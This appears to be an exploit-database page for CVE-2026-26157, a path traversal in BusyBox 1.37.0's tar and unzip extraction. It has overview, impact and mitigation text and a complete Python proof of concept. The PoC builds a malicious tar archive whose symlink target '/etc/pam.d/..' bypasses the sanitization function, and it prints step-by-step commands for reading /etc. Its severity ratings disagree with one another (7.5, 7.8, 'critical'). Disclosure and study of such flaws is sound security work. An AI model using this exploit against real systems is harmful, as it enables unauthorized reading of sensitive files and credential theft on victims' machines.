Skip to main content
Home/Exploits/WebApps/BusyBox 1.37.0 – Path Traversal
EXPLOIT HIGH (7.5)

BusyBox 1.37.0 – Path Traversal

CVE ID: CVE-2026-26157
Vulnerability Type: Directory Traversal
Author: Calil Khalil
Categories: WebApps

Overview

The BusyBox 1.37.0 vulnerability, identified as CVE-2026-26157, is a critical path traversal flaw that impacts systems utilizing this widely adopted software suite. BusyBox, often referred to as the “Swiss Army Knife” of embedded Linux, combines various Unix utilities into a single executable, making it a popular choice for resource-constrained environments. This vulnerability allows an attacker to manipulate file paths, potentially leading to unauthorized access to sensitive files on the system.

Technical Details

This vulnerability arises from improper validation of user-supplied input in file path handling routines within BusyBox. Specifically, an attacker can exploit this flaw by crafting a malicious request that includes directory traversal sequences (e.g., ../) to navigate the filesystem hierarchy. When the vulnerable BusyBox instance processes such input, it may inadvertently grant access to files outside its intended directory scope.

For example, an attacker could execute a command that retrieves sensitive configuration files or user data, such as /etc/passwd, thereby compromising the integrity and confidentiality of the system. This vulnerability is particularly severe in scenarios where BusyBox is used in web applications or network services, as it can lead to the exposure of critical information without authentication.

Impact

The potential consequences of exploiting CVE-2026-26157 are significant. An attacker could gain unauthorized access to sensitive files, leading to data breaches, system compromise, or further exploitation of the underlying infrastructure. In environments such as IoT devices, where BusyBox is commonly deployed, this could result in widespread vulnerabilities across multiple devices, affecting both consumer and enterprise systems.

Mitigation

To protect against CVE-2026-26157, security professionals should immediately update to the latest version of BusyBox, where the vulnerability has been addressed. Regular patch management is crucial in maintaining the security posture of any system. Additionally, implementing input validation and sanitization measures can help mitigate the risk of path traversal attacks.

Furthermore, employing security mechanisms such as file access controls, intrusion detection systems, and network segmentation can enhance overall security. Conducting regular security audits and penetration testing will also help identify and remediate potential vulnerabilities before they can be exploited by malicious actors.

Proof of Concept (PoC)

poc.py 
# Exploit Title: BusyBox 1.37.0 - Path Traversal 
# Google Dork: N/A
# Date: 2026-02-11
# Exploit Author: Calil Khalil
# Vendor Homepage: https://busybox.net
# Software Link: https://busybox.net/downloads/
# Version: BusyBox 1.36.1, 1.37.0
# Tested on: Ubuntu 22.04 LTS, Alpine Linux 3.19
# CVE: CVE-2026-26157

"""
BusyBox Path Traversal Vulnerability (CVE-2026-26157)

Description:
BusyBox archive extraction utilities fail to properly sanitize symlink targets
containing trailing ".." components. The strip_unsafe_prefix() function in
archival/libarchive/unsafe_prefix.c uses strstr(cp, "/../") which only matches
the 4-character pattern and misses 3-character trailing "/.." sequences.

This allows an attacker to craft malicious archives with symlinks pointing to
arbitrary filesystem locations, enabling information disclosure through symlink
traversal.

Affected Components:
- tar (primary vector)
- unzip
- rpm
- ar

Impact:
- CVSS Score: 7.8 (HIGH)
- Arbitrary file read via symlink traversal
- Information disclosure
- Credential theft

Root Cause:
archival/libarchive/unsafe_prefix.c:23
The pattern matching in strip_unsafe_prefix() fails on trailing ".." paths:
  cp2 = strstr(cp, "/../");  // Only matches "/../", misses "/pam.d/.."
  if (!cp2) break;

Attack Scenario:
1. Attacker creates TAR archive with symlink: sensitive_data -> /etc/pam.d/..
2. Victim extracts archive using BusyBox tar
3. Symlink created without sanitization
4. Symlink resolves to /etc directory
5. Application reading 'sensitive_data' exposes /etc contents

References:
- https://github.com/calilkhalil/research
- Red Hat CNA Case: INC3907198
"""

import tarfile
import sys
import os

def create_exploit():
    """
    Creates a malicious TAR file exploiting CVE-2026-26157.
    
    The archive contains a symlink with an unsanitized target that
    resolves outside the extraction directory.
    """
    
    exploit_file = 'CVE-2026-26157_exploit.tar'
    
    try:
        with tarfile.open(exploit_file, 'w') as tar:
            # Create symlink with trailing ".." in target path
            # This bypasses strip_unsafe_prefix() pattern matching
            info = tarfile.TarInfo('sensitive_data')
            info.type = tarfile.SYMTYPE
            info.linkname = '/etc/pam.d/..'  # Resolves to /etc
            tar.addfile(info)
        
        print(f"[+] Exploit created: {exploit_file}")
        print(f"n[*] Exploitation steps:")
        print(f"  1. mkdir test_extraction && cd test_extraction")
        print(f"  2. busybox tar xf ../{exploit_file}")
        print(f"  3. readlink -f sensitive_data")
        print(f"     Expected output: /etc")
        print(f"  4. ls sensitive_data/")
        print(f"     Result: Lists /etc directory contents")
        print(f"n[!] Impact: Arbitrary directory read via symlink traversal")
        print(f"[!] CVSS: 7.8 HIGH (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)")
        
        return exploit_file
        
    except Exception as e:
        print(f"[-] Error creating exploit: {e}")
        sys.exit(1)

def show_technical_details():
    """Display technical analysis of the vulnerability"""
    
    print("n" + "="*70)
    print("TECHNICAL ANALYSIS - CVE-2026-26157")
    print("="*70)
    print("nVulnerable Function:")
    print("  archival/libarchive/unsafe_prefix.c:strip_unsafe_prefix()")
    print("nVulnerable Code Pattern:")
    print("  cp2 = strstr(cp, "/../");  // Only matches 4-char sequence")
    print("  if (!cp2) break;")
    print("nBypass Technique:")
    print("  Path: /etc/pam.d/..")
    print("  Pattern check: strstr("/etc/pam.d/..", "/../") -> NULL")
    print("  Result: Sanitization bypassed, symlink created with original target")
    print("nExploitation Flow:")
    print("  1. Archive contains: symlink 'sensitive_data' -> '/etc/pam.d/..'")
    print("  2. get_header_tar() extracts symlink metadata")
    print("  3. Symlink target NOT sanitized (bypass detected)")
    print("  4. data_extract_all() creates symlink with '/etc/pam.d/..'")
    print("  5. Target resolves: /etc/pam.d/.. -> /etc")
    print("  6. Reading 'sensitive_data' = reading /etc")
    print("="*70 + "n")

if __name__ == "__main__":
    print("="*70)
    print("BusyBox Path Traversal Exploit - CVE-2026-26157")
    print("Author: Calil Khalil")
    print("="*70)
    
    # Display technical analysis
    show_technical_details()
    
    # Create exploit
    exploit_file = create_exploit()
    
    print("n[*] Mitigation:")
    print("  - Update BusyBox to patched version")
    print("  - Patch applies strip_unsafe_prefix() to symlink targets")
    print("  - Do not extract untrusted archives with elevated privileges")
    
    print("n[*] For educational and authorized testing purposes only")

Security Disclaimer

This exploit is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal and may result in severe legal consequences. Always ensure you have explicit permission before testing vulnerabilities.

sh3llz@loading:~$
Loading security modules...